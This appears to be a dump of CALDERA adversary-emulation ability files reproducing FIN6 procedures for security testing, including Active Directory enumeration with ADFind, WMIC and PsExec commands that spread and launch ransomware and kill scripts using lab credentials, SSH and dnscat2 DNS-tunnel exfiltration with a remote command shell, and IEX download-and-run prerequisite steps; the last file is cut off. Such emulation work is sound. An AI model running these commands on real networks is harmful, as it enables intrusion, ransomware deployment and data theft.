15 |           'adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt'
16 |         payloads:
17 |         - adfind.exe
18 |   input_arguments:
19 |     adfind_exe:
20 |       description: Path of adfind.exe
21 |       type: Path
22 |       default: C:\ProgramData\adfind.exe
23 |     adfind_url:
24 |       description: Path to download ADFind zip file
25 |       type: URL
26 |       default: http://www.joeware.net/downloads/files/AdFind.zip
27 |     adfind_zip_hash:
28 |       description: File hash of the ADFind zip file
29 |       type: String
30 |       default: 2643F985473B44335B2686C9722F8EB9AA74B4BC368065DE61C87F0298EAC600
31 |   dependency_executor_name: powershell
32 |   dependencies:
33 |   - description: Adfind.exe must exist on disk at specified location (#{adfind_exe})
34 |     prereq_command: if (Test-Path \#{adfind_exe}) {exit 0} else {exit 1}
35 |     get_prereq_command: |
36 |       $parentpath = Split-Path "#{adfind_exe}"; $zippath = "$parentpath\adfind.zip"
37 |       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
38 |       if(Invoke-WebRequestVerifyHash "#{adfind_url}" "$zippath" \#{adfind_zip_hash}){
39 |       Expand-Archive $zippath $parentpath\adfind -Force
40 |       Move-Item $parentpath\adfind\adfind.exe "#{adfind_exe}"
41 |       Remove-Item $zippath, $parentpath\adfind -Recurse
42 |       }
43 |   executors:
44 |   - name: command_prompt
45 |     command: adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt
46 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/discovery/2738b811-a360-4a4f-af9d-704343ebab4d.yml:
--------------------------------------------------------------------------------
 1 | - id: 2738b811-a360-4a4f-af9d-704343ebab4d
 2 |   name: Enumerate AD groups
 3 |   description: List groups and output the results to a text file.
 4 |   tactic: discovery
 5 |   technique:
 6 |     attack_id: T1069.002
 7 |     name: 'Permission Groups Discovery: Domain Groups'
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
 9 |   procedure_group: procedure_discovery
10 |   procedure_step: '2.6'
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           'adfind.exe -f (objectcategory=group) > ad_group.txt'
16 |         payloads:
17 |         - adfind.exe
18 |   input_arguments:
19 |     adfind_exe:
20 |       description: Path of adfind.exe
21 |       type: Path
22 |       default: C:\ProgramData\adfind.exe
23 |     adfind_url:
24 |       description: Path to download ADFind zip file
25 |       type: URL
26 |       default: http://www.joeware.net/downloads/files/AdFind.zip
27 |     adfind_zip_hash:
28 |       description: File hash of the ADFind zip file
29 |       type: String
30 |       default: 2643F985473B44335B2686C9722F8EB9AA74B4BC368065DE61C87F0298EAC600
31 |   dependency_executor_name: powershell
32 |   dependencies:
33 |   - description: Adfind.exe must exist on disk at specified location (#{adfind_exe})
34 |     prereq_command: if (Test-Path \#{adfind_exe}) {exit 0} else {exit 1}
35 |     get_prereq_command: |
36 |       $parentpath = Split-Path "#{adfind_exe}"; $zippath = "$parentpath\adfind.zip"
37 |       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
38 |       if(Invoke-WebRequestVerifyHash "#{adfind_url}" "$zippath" \#{adfind_zip_hash}){
39 |       Expand-Archive $zippath $parentpath\adfind -Force
40 |       Move-Item $parentpath\adfind\adfind.exe "#{adfind_exe}"
41 |       Remove-Item $zippath, $parentpath\adfind -Recurse
42 |       }
43 |   executors:
44 |   - name: command_prompt
45 |     command: adfind.exe -f (objectcategory=group) > ad_group.txt
46 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/discovery/5b24eef2-7a7f-4d34-8cab-e588074c59bc.yml:
--------------------------------------------------------------------------------
 1 | - id: 5b24eef2-7a7f-4d34-8cab-e588074c59bc
 2 |   name: Enumerate AD computer objects
 3 |   description: Identify all computer objects and output the results to a text file.
 4 |   tactic: discovery
 5 |   technique:
 6 |     attack_id: T1018
 7 |     name: Remote System Discovery
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
 9 |   procedure_group: procedure_discovery
10 |   procedure_step: '2.2'
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           'adfind.exe -f (objectcategory=computer) > ad_computers.txt'
16 |         payloads:
17 |         - adfind.exe
18 |   input_arguments:
19 |     adfind_exe:
20 |       description: Path of adfind.exe
21 |       type: Path
22 |       default: C:\ProgramData\adfind.exe
23 |     adfind_url:
24 |       description: Path to download ADFind zip file
25 |       type: URL
26 |       default: http://www.joeware.net/downloads/files/AdFind.zip
27 |     adfind_zip_hash:
28 |       description: File hash of the ADFind zip file
29 |       type: String
30 |       default: 2643F985473B44335B2686C9722F8EB9AA74B4BC368065DE61C87F0298EAC600
31 |   dependency_executor_name: powershell
32 |   dependencies:
33 |   - description: Adfind.exe must exist on disk at specified location (#{adfind_exe})
34 |     prereq_command: if (Test-Path \#{adfind_exe}) {exit 0} else {exit 1}
35 |     get_prereq_command: |
36 |       $parentpath = Split-Path "#{adfind_exe}"; $zippath = "$parentpath\adfind.zip"
37 |       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
38 |       if(Invoke-WebRequestVerifyHash "#{adfind_url}" "$zippath" \#{adfind_zip_hash}){
39 |       Expand-Archive $zippath $parentpath\adfind -Force
40 |       Move-Item $parentpath\adfind\adfind.exe "#{adfind_exe}"
41 |       Remove-Item $zippath, $parentpath\adfind -Recurse
42 |       }
43 |   executors:
44 |   - name: command_prompt
45 |     command: adfind.exe -f (objectcategory=computer) > ad_computers.txt
46 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/discovery/d30692dd-779f-4a40-b947-de23dabbb033.yml:
--------------------------------------------------------------------------------
 1 | - id: d30692dd-779f-4a40-b947-de23dabbb033
 2 |   name: Enumerate AD Organizational Units
 3 |   description: Enumerate all Organizational Units (OUs) in the domain of the user running the command and output the results to a text file.
 4 |   tactic: discovery
 5 |   technique:
 6 |     attack_id: T1482
 7 |     name: Domain Trust Discovery
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
 9 |   procedure_group: procedure_discovery
10 |   procedure_step: '2.3'
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           'adfind.exe -f (objectcategory=organizationalUnit) > ad_ous.txt'
16 |         payloads:
17 |         - adfind.exe
18 |   input_arguments:
19 |     adfind_exe:
20 |       description: Path of adfind.exe
21 |       type: Path
22 |       default: C:\ProgramData\adfind.exe
23 |     adfind_url:
24 |       description: Path to download ADFind zip file
25 |       type: URL
26 |       default: http://www.joeware.net/downloads/files/AdFind.zip
27 |     adfind_zip_hash:
28 |       description: File hash of the ADFind zip file
29 |       type: String
30 |       default: 2643F985473B44335B2686C9722F8EB9AA74B4BC368065DE61C87F0298EAC600
31 |   dependency_executor_name: powershell
32 |   dependencies:
33 |   - description: Adfind.exe must exist on disk at specified location (#{adfind_exe})
34 |     prereq_command: if (Test-Path \#{adfind_exe}) {exit 0} else {exit 1}
35 |     get_prereq_command: |
36 |       $parentpath = Split-Path "#{adfind_exe}"; $zippath = "$parentpath\adfind.zip"
37 |       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
38 |       if(Invoke-WebRequestVerifyHash "#{adfind_url}" "$zippath" \#{adfind_zip_hash}){
39 |       Expand-Archive $zippath $parentpath\adfind -Force
40 |       Move-Item $parentpath\adfind\adfind.exe "#{adfind_exe}"
41 |       Remove-Item $zippath, $parentpath\adfind -Recurse
42 |       }
43 |   executors:
44 |   - name: command_prompt
45 |     command: adfind.exe -f (objectcategory=organizationalUnit) > ad_ous.txt
46 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/discovery/e44a39ce-0651-3ddd-8f05-f83aa2ffd657.yml:
--------------------------------------------------------------------------------
 1 | - id: e44a39ce-0651-3ddd-8f05-f83aa2ffd657
 2 |   name: Enumerate AD person objects
 3 |   description: Find all person objects and output the results to a text file.
 4 |   tactic: discovery
 5 |   technique:
 6 |     attack_id: T1087.002
 7 |     name: 'Account Discovery: Domain Account'
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
 9 |   procedure_group: procedure_discovery
10 |   procedure_step: '2.1'
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           'adfind.exe -f (objectcategory=person) > ad_users.txt'
16 |         payloads:
17 |         - adfind.exe
18 |   input_arguments:
19 |     adfind_exe:
20 |       description: Path of adfind.exe
21 |       type: Path
22 |       default: C:\ProgramData\adfind.exe
23 |     adfind_url:
24 |       description: Path to download ADFind zip file
25 |       type: URL
26 |       default: http://www.joeware.net/downloads/files/AdFind.zip
27 |     adfind_zip_hash:
28 |       description: File hash of the ADFind zip file
29 |       type: String
30 |       default: 2643F985473B44335B2686C9722F8EB9AA74B4BC368065DE61C87F0298EAC600
31 |   dependency_executor_name: powershell
32 |   dependencies:
33 |   - description: Adfind.exe must exist on disk at specified location (#{adfind_exe})
34 |     prereq_command: if (Test-Path \#{adfind_exe}) {exit 0} else {exit 1}
35 |     get_prereq_command: |
36 |       $parentpath = Split-Path "#{adfind_exe}"; $zippath = "$parentpath\adfind.zip"
37 |       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
38 |       if(Invoke-WebRequestVerifyHash "#{adfind_url}" "$zippath" \#{adfind_zip_hash}){
39 |       Expand-Archive $zippath $parentpath\adfind -Force
40 |       Move-Item $parentpath\adfind\adfind.exe "#{adfind_exe}"
41 |       Remove-Item $zippath, $parentpath\adfind -Recurse
42 |       }
43 |   executors:
44 |   - name: command_prompt
45 |     command: adfind.exe -f (objectcategory=person) > ad_users.txt
46 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/discovery/e4cdb5c6-d322-3b6e-ac8e-68b2e8a7dd4c.yml:
--------------------------------------------------------------------------------
 1 | - id: e4cdb5c6-d322-3b6e-ac8e-68b2e8a7dd4c
 2 |   name: Enumerate AD subnets
 3 |   description: List subnets and output the results to a text file.
 4 |   tactic: discovery
 5 |   technique:
 6 |     attack_id: T1016
 7 |     name: System Network Configuration Discovery
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
 9 |   procedure_group: procedure_discovery
10 |   procedure_step: '2.5'
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           'adfind.exe -gcb -sc trustdmp > ad_subnets.txt'
16 |         payloads:
17 |         - adfind.exe
18 |   input_arguments:
19 |     adfind_exe:
20 |       description: Path of adfind.exe
21 |       type: Path
22 |       default: C:\ProgramData\adfind.exe
23 |     adfind_url:
24 |       description: Path to download ADFind zip file
25 |       type: URL
26 |       default: http://www.joeware.net/downloads/files/AdFind.zip
27 |     adfind_zip_hash:
28 |       description: File hash of the ADFind zip file
29 |       type: String
30 |       default: 2643F985473B44335B2686C9722F8EB9AA74B4BC368065DE61C87F0298EAC600
31 |   dependency_executor_name: powershell
32 |   dependencies:
33 |   - description: Adfind.exe must exist on disk at specified location (#{adfind_exe})
34 |     prereq_command: if (Test-Path \#{adfind_exe}) {exit 0} else {exit 1}
35 |     get_prereq_command: |
36 |       $parentpath = Split-Path "#{adfind_exe}"; $zippath = "$parentpath\adfind.zip"
37 |       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
38 |       if(Invoke-WebRequestVerifyHash "#{adfind_url}" "$zippath" \#{adfind_zip_hash}){
39 |       Expand-Archive $zippath $parentpath\adfind -Force
40 |       Move-Item $parentpath\adfind\adfind.exe "#{adfind_exe}"
41 |       Remove-Item $zippath, $parentpath\adfind -Recurse
42 |       }
43 |   executors:
44 |   - name: command_prompt
45 |     command: adfind.exe -gcb -sc trustdmp > ad_subnets.txt
46 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/execution/0c752dce-9302-4465-805f-522650aece3f.yml:
--------------------------------------------------------------------------------
 1 | - id: 0c752dce-9302-4465-805f-522650aece3f
 2 |   name: Execute Kill Scripts via PsExec
 3 |   description: FIN6 has utilized PsExec to execute kill scripts on intended targets
 4 |   tactic: execution
 5 |   technique:
 6 |     attack_id: T1569.002
 7 |     name: 'System Services: Service Execution'
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
 9 |   procedure_group: procedure_ransomware_execute_psexec
10 |   procedure_step: 7.3.3
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           start psexec.exe \\#{internal_IP} -u \#{domain_user} -p \#{password} -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\#{batch_file}
16 |   input_arguments:
17 |     internal_IP:
18 |       description: Hostname or IP address
19 |       type: string
20 |       default: 172.18.39.6
21 |     domain_user:
22 |       description: Domain and username
23 |       type: string
24 |       default: ctid\pgustavo
25 |     password:
26 |       description: Valid Password
27 |       type: string
28 |       default: 'W1n1!2019'
29 |     batch_file:
30 |       description: windows.bat or kill.bat
31 |       type: string
32 |   executors:
33 |   - name: command_prompt
34 |     elevation_required: true
35 |     command: start psexec.exe \\#{internal_IP} -u \#{domain_user} -p \#{password} -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\#{batch_file}
36 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/execution/5599b7cf-6e8d-43c1-a311-e953dd0fbd2a.yml:
--------------------------------------------------------------------------------
 1 | - id: 5599b7cf-6e8d-43c1-a311-e953dd0fbd2a
 2 |   name: Distribute Ransomware via WMI
 3 |   description: FIN6 utilizes WMI to distribute ransomware to intended targets
 4 |   tactic: execution
 5 |   technique:
 6 |     attack_id: T1047
 7 |     name: Windows Management Instrumentation
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
 9 |   procedure_group: procedure_ransomware_distribute
10 |   procedure_step: 7.2.1
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           start wmic /node:#{internal_IP} /user:#{domain_user} /password:#{password} process call create "cmd.exe /c copy \\#{internal_IP}\c$\windows\temp\sss.exe c:\windows\temp\"
16 |   input_arguments:
17 |     internal_IP:
18 |       description: Hostname or IP address
19 |       type: string
20 |       default: 172.18.39.6
21 |     domain_user:
22 |       description: Domain and username
23 |       type: string
24 |       default: ctid\pgustavo
25 |     password:
26 |       description: Valid Password
27 |       type: string
28 |       default: 'W1n1!2019'
29 |   executors:
30 |   - name: command_prompt
31 |     elevation_required: true
32 |     command: start wmic /node:#{internal_IP} /user:#{domain_user} /password:#{password} process call create "cmd.exe /c copy \\#{internal_IP}\c$\windows\temp\sss.exe c:\windows\temp\"
33 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/execution/5dcbd042-e8e5-4f3f-8055-7284e4d5112c.yml:
--------------------------------------------------------------------------------
 1 | - id: 5dcbd042-e8e5-4f3f-8055-7284e4d5112c
 2 |   name: Distribute Kill Scripts via WMI
 3 |   description: FIN6 has utilized WMI to distribute kill scripts to intended targets
 4 |   tactic: execution
 5 |   technique:
 6 |     attack_id: T1047
 7 |     name: Windows Management Instrumentation
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
 9 |   procedure_group: procedure_ransomware_distribute
10 |   procedure_step: 7.2.2
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           start wmic /node:#{internal_IP} /user:#{domain_user} /password:#{password} process call create "cmd.exe /c copy \\#{internal_IP}\c$\windows\temp\#{batch_file} c:\windows\temp\"
16 |   input_arguments:
17 |     internal_IP:
18 |       description: Hostname or IP address
19 |       type: string
20 |       default: 172.18.39.6
21 |     domain_user:
22 |       description: Domain and username
23 |       type: string
24 |       default: ctid\pgustavo
25 |     password:
26 |       description: Valid Password
27 |       type: string
28 |       default: 'W1n1!2019'
29 |     batch_file:
30 |       description: windows.bat or kill.bat
31 |       type: string
32 |   executors:
33 |   - name: command_prompt
34 |     elevation_required: true
35 |     command: start wmic /node:#{internal_IP} /user:#{domain_user} /password:#{password} process call create "cmd.exe /c copy \\#{internal_IP}\c$\windows\temp\#{batch_file} c:\windows\temp\"
36 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/execution/661efd66-d876-41de-88ee-ba9ec4328154.yml:
--------------------------------------------------------------------------------
 1 | - id: 661efd66-d876-41de-88ee-ba9ec4328154
 2 |   name: WMIC Remote Process Execution
 3 |   description: WMIC to execute a process on a remote host. Specify the remote IP using node parameter.  FIN6 is reported to have used WMI to execute code on remote systems.
 4 |   tactic: execution
 5 |   technique:
 6 |     attack_id: T1047
 7 |     name: Windows Management Instrumentation
 8 |   cti_source: https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24
 9 |   procedure_group: procedure_pos_execution
10 |   procedure_step: '5.3'
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           wmic /node:"#{node}" process call create #{process_to_execute}
16 |         cleanup: |
17 |           wmic /node "#{node}" process where name="#{process_to_execute}" del >nul 2>&1
18 |   input_arguments:
19 |     node:
20 |       description: IP address
21 |       type: string
22 |       default: 172.18.39.6
23 |     process_to_execute:
24 |       description: Name or path of process to execute
25 |       type: string
26 |       default: notepad.exe
27 |   executors:
28 |   - name: command_prompt
29 |     elevation_required: false
30 |     command: wmic /node:"#{node}" process call create "#{process_to_execute}"
31 |     cleanup_command: wmic /node "#{node}" process where name="#{process_to_execute}" del >nul 2>&1


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/execution/b393c022-329a-4c52-ab1f-eb594ee8d3cd.yml:
--------------------------------------------------------------------------------
 1 | - id: b393c022-329a-4c52-ab1f-eb594ee8d3cd
 2 |   name: WMI Ransomware Distribution
 3 |   description: FIN6 utilizes WMI to distribute ransomware to intended targets
 4 |   tactic: execution
 5 |   technique:
 6 |     attack_id: T1047
 7 |     name: Windows Management Instrumentation
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
 9 |   procedure_group: procedure_ransomware_distribution
10 |   procedure_step: 7.1.1
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           start wmic /node:#{Ransomware_recipient} /user:#{"domain_username"} /password:#{"password"} process call create "cmd.exe /c copy \\#{internal_IP}\c$\windows\temp\sss.exe c:\windows\temp\"
16 |   input_arguments:
17 |     Ransomware_recipient:
18 |       description: Hostname or IP address
19 |       type: string
20 |       default: 172.18.39.6
21 |     domain_username:
22 |       description: domain\\username
23 |       type: string
24 |       default: ctid\pgustavo
25 |     password:
26 |       description: user password
27 |       type: string
28 |       default: 'W1n1!2019'
29 |     internal_IP:
30 |       description: Hostname or IP address
31 |       type: string
32 |       default: 127.0.0.1
33 |   executors:
34 |   - name: command_prompt
35 |     command: start wmic /node:#{Ransomware_recipient} /user:#{"domain_username"} /password:#{"password"} process call create "cmd.exe /c copy \\#{internal IP}\c$\windows\temp\sss.exe c:\windows\temp\"
36 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/execution/c29e9cc7-b34f-46c2-bdbe-a41f757eae24.yml:
--------------------------------------------------------------------------------
 1 | - id: c29e9cc7-b34f-46c2-bdbe-a41f757eae24
 2 |   name: Execute Ransomware via WMIC
 3 |   description: FIN6 has utilized WMI to execute the ransomeware on intended targets
 4 |   tactic: execution
 5 |   technique:
 6 |     attack_id: T1047
 7 |     name: Windows Management Instrumentation
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
 9 |   procedure_group: procedure_ransomware_execute_wmic
10 |   procedure_step: 7.3.2
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           start wmic /node:#{internal_IP} /user:#{domain_user} /password:#{password} process call create "cmd /c c:\windows\temp\sss.exe"
16 |   input_arguments:
17 |     internal_IP:
18 |       description: Hostname or IP address
19 |       type: string
20 |       default: 172.18.39.6
21 |     domain_user:
22 |       description: Domain and username
23 |       type: string
24 |       default: ctid\pgustavo
25 |     password:
26 |       description: Valid Password
27 |       type: string
28 |       default: 'W1n1!2019'
29 |   executors:
30 |   - name: command_prompt
31 |     elevation_required: true
32 |     command: start wmic /node:#{internal_IP} /user:#{domain_user} /password:#{password} process call create "cmd /c c:\windows\temp\sss.exe"
33 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/execution/d77838f6-d562-3480-ad29-2cbeee8b7b45.yml:
--------------------------------------------------------------------------------
 1 | - id: d77838f6-d562-3480-ad29-2cbeee8b7b45
 2 |   name: Execute Ransomware via PsExec
 3 |   description: FIN6 has utilized PsExec to execute ransomeware on intended targets
 4 |   tactic: execution
 5 |   technique:
 6 |     attack_id: T1569.002
 7 |     name: 'System Services: Service Execution'
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
 9 |   procedure_group: procedure_ransomware_psexec
10 |   procedure_step: 7.3.4
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           start psexec.exe \\#{internal_IP} -u \#{domain_user} -p \#{password} -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe
16 |   input_arguments:
17 |     internal_IP:
18 |       description: Hostname or IP address
19 |       type: string
20 |       default: 172.18.39.6
21 |     domain_user:
22 |       description: Domain and username
23 |       type: string
24 |       default: ctid\pgustavo
25 |     password:
26 |       description: Valid Password
27 |       type: string
28 |       default: 'W1n1!2019'
29 |   executors:
30 |   - name: command_prompt
31 |     elevation_required: true
32 |     command: start psexec.exe \\#{internal_IP} -u \#{domain_user} -p \#{password} -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe
33 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/execution/e4027dff-280b-4964-82be-b35a40c4a493.yml:
--------------------------------------------------------------------------------
 1 | - id: e4027dff-280b-4964-82be-b35a40c4a493
 2 |   name: PsExec Remote Command
 3 |   description: Use PsExec to execute a command on a remote host. FIN6 is reported to have used a variant of PsExec to execute code on remote hosts.
 4 |   tactic: execution
 5 |   technique:
 6 |     attack_id: T1569.002
 7 |     name: 'System Services: Service Execution'
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
 9 |   procedure_group: procedure_pos_execution
10 |   procedure_step: '5.1'
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           PsExec.exe \\#{remote_host} #{remote_command}
16 |         payloads:
17 |         - PsExec.exe
18 |   input_arguments:
19 |     psexec_exe:
20 |       description: Path to Psexec
21 |       type: string
22 |       default: C:\PSTools\PsExec.exe
23 |     remote_host:
24 |       description: Remote host or IP address
25 |       type: string
26 |       default: 172.18.39.6
27 |     remote_command:
28 |       description: Remote command to run
29 |       type: string
30 |       default: calc.exe
31 |   dependency_executor_name: powershell
32 |   dependencies:
33 |   - description: PsExec must exist on disk at specified location (#{psexec_exe})
34 |     prereq_command: if (Test-Path "#{psexec_exe}") {exit 0} else {exit 1}
35 |     get_prereq_command: |
36 |       Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PSTools.zip"
37 |       Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
38 |       New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
39 |       Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
40 |   executors:
41 |   - name: powershell
42 |     elevation_required: false
43 |     command: "#{psexec_exe} \#{remote_host} #{remote_command}""
44 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/execution/eb4c2ff6-3534-404c-bf1c-d864a508c162.yml:
--------------------------------------------------------------------------------
 1 | - id: eb4c2ff6-3534-404c-bf1c-d864a508c162
 2 |   name: Execute Kill Scripts via WMI
 3 |   description: FIN6 has utilized WMI to execute kill scripts on intended targets
 4 |   tactic: execution
 5 |   technique:
 6 |     attack_id: T1047
 7 |     name: Windows Management Instrumentation
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
 9 |   procedure_group: procedure_ransomware_execute_wmic
10 |   procedure_step: 7.3.1
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           start wmic /node:#{internal_IP} /user:#{domain_user} /password:#{password} process call create "cmd /c c:\windows\temp\#{batch_file}"
16 |   input_arguments:
17 |     internal_IP:
18 |       description: Hostname or IP address
19 |       type: string
20 |       default: 172.18.39.6
21 |     domain_user:
22 |       description: Domain and username
23 |       type: string
24 |       default: ctid\pgustavo
25 |     password:
26 |       description: Valid Password
27 |       type: string
28 |       default: 'W1n1!2019'
29 |     batch_file:
30 |       description: windows.bat or kill.bat
31 |       type: string
32 |   executors:
33 |   - name: command_prompt
34 |     elevation_required: true
35 |     command: start wmic /node:#{internal_IP} /user:#{domain_user} /password:#{password} process call create "cmd /c c:\windows\temp\#{batch_file}"
36 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/exfiltration/78d94199-7e0e-442b-81a6-32f8e419a7ac.yml:
--------------------------------------------------------------------------------
 1 | - id: 78d94199-7e0e-442b-81a6-32f8e419a7ac
 2 |   name: Exfiltrate Data via SSH
 3 |   description: Initiate an interactive SSH session with a remote server
 4 |   tactic: exfiltration
 5 |   technique:
 6 |     attack_id: T1567.002
 7 |     name: 'Exfiltration Over Web Service: Exfiltration to Cloud Storage'
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
 9 |   procedure_group: procedure_exfiltration
10 |   procedure_step: '4.2'
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           putty.exe -ssh #{user}@#{exfil_server}
16 |         payloads:
17 |         - putty.exe
18 |   input_arguments:
19 |     putty_exe:
20 |       description: Path of putty.exe
21 |       type: Path
22 |       default: C:\ProgramData\putty.exe
23 |     putty_url:
24 |       description: Path to download putty file
25 |       type: URL
26 |       default: https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe
27 |     putty_hash:
28 |       description: File hash of the putty exe file
29 |       type: String
30 |       default: 961B36BB78D27B3432FAE08E5C4272FE295B5E24E832C6F6BF1EC3CF87057DAB
31 |     user:
32 |       description: username
33 |       type: string
34 |       default: wardog
35 |     exfil_server:
36 |       description: hostname or IP address
37 |       type: string
38 |       default: 127.0.0.1
39 |   dependency_executor_name: powershell
40 |   dependencies:
41 |   - description: putty.exe must exist on disk at specified location (#{putty_exe})
42 |     prereq_command: if (Test-Path \#{putty_exe}) {exit 0} else {exit 1}
43 |     get_prereq_command: |
44 |       $parentpath = Split-Path "#{putty_exe}"; $zippath = "$parentpath\putty.zip"
45 |       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
46 |       if(Invoke-WebRequestVerifyHash "#{putty_url}" "$zippath" \#{putty_hash}) {
47 |       Expand-Archive $zippath $parentpath\putty -Force
48 |       Move-Item $parentpath\putty\putty.exe "#{putty_exe}"
49 |       Remove-Item $zippath, $parentpath\putty -Recurse
50 |       }
51 |   executors:
52 |   - name: command_prompt
53 |     command: "putty.exe -ssh #{user}@#{exfil_server}"
54 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/exfiltration/e74554b8-0bc9-3d50-95a4-e45421925b49.yml:
--------------------------------------------------------------------------------
 1 | - id: e74554b8-0bc9-3d50-95a4-e45421925b49
 2 |   name: dnscat2-powershell Exfiltration
 3 |   description: Powershell to execute POS data exfiltration over DNS tunnel via dnscat2
 4 |   tactic: exfiltration
 5 |   technique:
 6 |     attack_id: T1048.003
 7 |     name: 'Exfiltration Over Alternative Protocol: Unencrypted/Obfuscated Non-C2 Protocol'
 8 |   cti_source: https://exchange.xforce.ibmcloud.com/threat-group/f8409554b71a79792ff099081bc5ac24
 9 |   procedure_group: procedure_pos_exfiltration
10 |   procedure_step: '5.5'
11 |   platforms:
12 |     windows:
13 |       psh:
14 |         command: |
15 |           import-module #{file_path}\\dnscat2.ps1
16 |           Start-Dnscat2 -Domain #{dnscat2_server} Exec cmd
17 |         payloads:
18 |         - dnscat2.ps1
19 |   input_arguments:
20 |     dnscat_ps1:
21 |       description: Path of dnscat2.ps1
22 |       type: Path
23 |       default: C:\ProgramData\dnscat2.ps1
24 |     dnscat2_url:
25 |       description: Path to download dnscat2 .ps1 file
26 |       type: URL
27 |       default: https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1
28 |     dnscat2_hash:
29 |       description: File hash of the dnscat2 .ps1 file
30 |       type: String
